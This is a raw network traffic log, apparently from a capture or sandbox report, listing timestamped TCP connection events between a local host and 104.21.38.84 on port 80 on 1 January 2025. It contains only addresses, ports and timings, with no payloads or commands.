                                                                                                                  Jan 1, 2025 15:04:41.385452986 CET5021380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.386080980 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.390561104 CET8050213104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.390613079 CET5021380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.390925884 CET8050214104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.390990019 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.391074896 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.395804882 CET8050214104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.510689020 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.515595913 CET8050215104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.515676022 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.515825987 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.520631075 CET8050215104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.744077921 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.749030113 CET8050214104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.749138117 CET8050214104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.835031986 CET8050214104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.869122028 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.874046087 CET8050215104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:41.931489944 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:41.961116076 CET8050215104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.009597063 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.149120092 CET8050214104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.226737976 CET8050215104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.228450060 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.276456118 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.351056099 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.351070881 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.352308989 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.356328011 CET8050214104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.356492996 CET5021480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.356614113 CET8050215104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.357105017 CET8050216104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.360517979 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.360522985 CET5021580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.364454985 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.369232893 CET8050216104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.716449022 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:42.721633911 CET8050216104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.802398920 CET8050216104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:42.932445049 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.075751066 CET8050216104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:43.177150965 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.197976112 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.199204922 CET5021780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.203010082 CET8050216104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:43.203062057 CET5021680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.204067945 CET8050217104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:43.204123974 CET5021780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.204232931 CET5021780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.209007025 CET8050217104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:43.556818008 CET5021780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.562031031 CET8050217104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:43.658370018 CET8050217104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:43.712707996 CET5021780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:43.925647020 CET8050217104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:43.978344917 CET5021780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:44.054953098 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:44.176165104 CET8050217104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:44.176631927 CET8050218104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:44.176713943 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:44.176748991 CET5021780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:44.177011967 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:44.181786060 CET8050218104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:44.525475025 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:44.530339003 CET8050218104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:44.624095917 CET8050218104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:44.682497025 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:44.891618013 CET8050218104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:44.950510979 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.021773100 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.022618055 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.026917934 CET8050218104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.027440071 CET8050219104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.030791998 CET5021880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.030793905 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.031013966 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.035748005 CET8050219104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.400763035 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.406205893 CET8050219104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.475047112 CET8050219104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.525248051 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.654426098 CET8050219104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.778848886 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.780386925 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.781251907 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.785407066 CET8050219104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.785450935 CET5021980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.786040068 CET8050220104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:45.786098957 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.786263943 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:45.791032076 CET8050220104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:46.134977102 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.139951944 CET8050220104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:46.230362892 CET8050220104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:46.278554916 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.493863106 CET8050220104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:46.542535067 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.580539942 CET8050220104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:46.634676933 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.710549116 CET5022180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.710549116 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.715519905 CET8050221104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:46.715809107 CET8050220104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:46.715902090 CET5022080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.715941906 CET5022180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.716064930 CET5022180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:46.720829964 CET8050221104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.072804928 CET5022180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.077673912 CET8050221104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.160317898 CET8050221104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.176213026 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.181124926 CET8050222104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.181185007 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.181354046 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.182255983 CET5022180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.186122894 CET8050222104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.187335014 CET8050221104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.187374115 CET5022180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.355930090 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.360790968 CET8050223104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.360852003 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.360949039 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.365786076 CET8050223104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.525681973 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.530602932 CET8050222104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.530801058 CET8050222104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.640980959 CET8050222104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.712901115 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.717710018 CET8050223104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.788104057 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.814145088 CET8050222104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.825180054 CET8050223104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:47.868988037 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:47.893925905 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.083904982 CET8050223104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.136639118 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.211348057 CET5022480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.211352110 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.211353064 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.216227055 CET8050224104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.216383934 CET5022480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.216413975 CET8050222104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.216459036 CET5022480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.216579914 CET5022280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.216886997 CET8050223104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.220626116 CET5022380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.221220970 CET8050224104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.572464943 CET5022480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.577337027 CET8050224104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.679018021 CET8050224104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.728465080 CET5022480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:48.940103054 CET8050224104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:48.996464968 CET5022480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.055507898 CET5022580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.060379982 CET8050225104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:49.060441971 CET5022580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.060569048 CET5022580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.065378904 CET8050225104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:49.416129112 CET5022580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.421001911 CET8050225104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:49.524312973 CET8050225104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:49.610289097 CET5022580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.708324909 CET8050225104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:49.835024118 CET5022580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.835865021 CET5022680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.840153933 CET8050225104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:49.840220928 CET5022580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.840696096 CET8050226104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:49.840769053 CET5022680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.840897083 CET5022680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:49.845609903 CET8050226104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:50.197920084 CET5022680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:50.202851057 CET8050226104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:50.334912062 CET8050226104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:50.432471037 CET5022680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:50.760993004 CET8050226104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:50.880474091 CET5022680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:50.884485006 CET5022780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:50.885520935 CET8050226104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:50.885765076 CET5022680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:50.889348984 CET8050227104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:50.889525890 CET5022780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:50.892474890 CET5022780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:50.897257090 CET8050227104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:51.334434032 CET8050227104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:51.372445107 CET5022780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.377367020 CET8050227104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:51.720608950 CET8050227104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:51.775254011 CET5022780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.840794086 CET5022480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.842736959 CET5022780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.843898058 CET5022880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.847765923 CET8050227104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:51.847805977 CET5022780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.848650932 CET8050228104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:51.848704100 CET5022880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.848803997 CET5022880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:51.853569031 CET8050228104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.200486898 CET5022880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.205446005 CET8050228104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.320940018 CET8050228104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.431533098 CET5022880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.485918045 CET8050228104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.600074053 CET5022880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.601105928 CET5022980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.605148077 CET8050228104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.605221987 CET5022880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.606021881 CET8050229104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.606096983 CET5022980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.606578112 CET5022980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.611356020 CET8050229104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.822945118 CET5022980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.823952913 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.828783989 CET8050230104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.828908920 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.828999996 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.833795071 CET8050230104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.871661901 CET8050229104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.948478937 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.953315973 CET8050231104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.953418016 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.953552961 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:52.958300114 CET8050231104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.983918905 CET8050229104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:52.984101057 CET5022980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.181767941 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.187479019 CET8050230104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.188503027 CET8050230104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.277867079 CET8050230104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.306755066 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.311534882 CET8050231104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.322137117 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.410409927 CET8050231104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.449691057 CET8050230104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.494079113 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.541299105 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.672210932 CET8050231104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.822160006 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.827133894 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.827198982 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.827873945 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.832416058 CET8050230104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.832484961 CET5023080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.832670927 CET8050232104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.832729101 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.832813978 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.832824945 CET8050231104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:53.832860947 CET5023180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:53.837559938 CET8050232104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:54.183088064 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.187992096 CET8050232104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:54.281277895 CET8050232104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:54.337765932 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.549941063 CET8050232104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:54.603401899 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.707281113 CET5023380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.707293987 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.712129116 CET8050233104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:54.712259054 CET5023380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.712331057 CET8050232104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:54.712354898 CET5023380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.712470055 CET5023280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:54.717144966 CET8050233104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:55.056860924 CET5023380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:55.061743975 CET8050233104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:55.177130938 CET8050233104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:55.228399992 CET5023380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:55.442816973 CET8050233104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:55.486526966 CET5023380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:55.574794054 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:55.579591990 CET8050234104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:55.579659939 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:55.579786062 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:55.584553957 CET8050234104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:55.931593895 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:55.936446905 CET8050234104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.033708096 CET8050234104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.136538029 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.209254980 CET8050234104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.322453022 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.334177017 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.334204912 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.339118004 CET8050235104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.339202881 CET8050234104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.339309931 CET5023480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.339310884 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.339615107 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.345036030 CET8050235104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.697422981 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:56.702281952 CET8050235104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.809869051 CET8050235104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:56.853578091 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.078437090 CET8050235104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:57.134646893 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.192908049 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.193836927 CET5023680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.197989941 CET8050235104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:57.198065996 CET5023580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.198726892 CET8050236104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:57.198801994 CET5023680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.198905945 CET5023680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.203641891 CET8050236104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:57.556643009 CET5023680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.561542988 CET8050236104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:57.643254042 CET8050236104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:57.806171894 CET5023680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:57.903290987 CET8050236104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:04:58.019449949 CET5023380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:58.024010897 CET5023680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:58.024854898 CET5023780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:04:58.029093981 CET8050236104.21.38.84192.168.2.4
